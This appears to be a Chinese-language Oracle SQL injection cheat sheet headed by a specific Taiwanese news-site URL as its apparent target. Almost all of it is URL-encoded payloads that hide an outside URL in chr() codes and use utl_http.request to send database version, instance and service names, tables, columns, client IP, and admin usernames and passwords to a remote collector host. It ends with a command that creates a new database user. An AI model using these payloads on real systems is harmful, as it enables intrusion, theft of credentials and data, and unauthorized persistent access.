http://www.1872.tw/News.Site/show.jsp?info_id=59865

Database Version版本信息：

http://www.nosec.org/product/oracle_info.txt

统计条数：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20v$version%20where%201=1))%20from%20dual)%20and%201=1 

第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(banner)%20as%20a%20from%20v$version%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

第二条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(banner)%20as%20a%20from%20v$version%20where%20rownum%3C=2%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E2-1%20order%20by%201)t))%20from%20dual)%20and%201=1

Database Name  数据裤名：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(name)%20from%20v$database%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1

instance_name sid登陆数据裤要用的：

%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(name)%20from%20v$database%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1

service_names服务器名：
统计：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20v$parameter%20where%20name=chr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(118)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(115)))%20from%20dual)%20and%201=1 
第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(value)%20as%20a%20from%20v$parameter%20where%20rownum%3C=1%20and%20name=chr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(118)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(115)%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

control_files：loc文件目录，可以来判断操作系统
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(value)%20as%20a%20from%20v$parameter%20where%20rownum%3C=1%20and%20name=chr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(108)%7C%7Cchr(95)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(115)%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1


User Name 用户名;
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(user)%20from%20user_tables%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1

USER_ROLE_PRIVS 权限：
统计：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20user_role_privs%20where%201=1))%20from%20dual)%20and%201=1 

第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(granted_role)%20as%20a%20from%20user_role_privs%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

Tables 表名：

统计：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20user_tables%20where%201=1))%20from%20dual)%20and%201=1

第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(table_name)%20as%20a%20from%20user_tables%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

第二条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(table_name)%20as%20a%20from%20user_tables%20where%20rownum%3C=2%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E2-1%20order%20by%201)t))%20from%20dual)%20and%201=1

连接ip:
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(sys_context(chr(117)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(118),chr(105)%7C%7Cchr(112)%7C%7Cchr(95)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(100)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(115)%7C%7Cchr(115)))%20from%20dual%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1



统计列数： 如admin=table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)

 or chr(91) in (select utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select count(*) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))) from dual) and 1=1

 爆列名：

 第一个列名：

 and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20COLUMN_NAME%20from%20COLS%20where%20table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)%20and%20rownum=1))=1--


爆内容：

统计记录条数：
 and UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select count(列名) from 表名 where rownum=1))=1--


第一个用户名：

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select USERNAME from ADMIN where rownum=1))=1--

密码：
and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select PASSWORD from ADMIN where rownum=1))=1--




















加用户：
CREATE USER zwell IDENTIFIED BY zwell

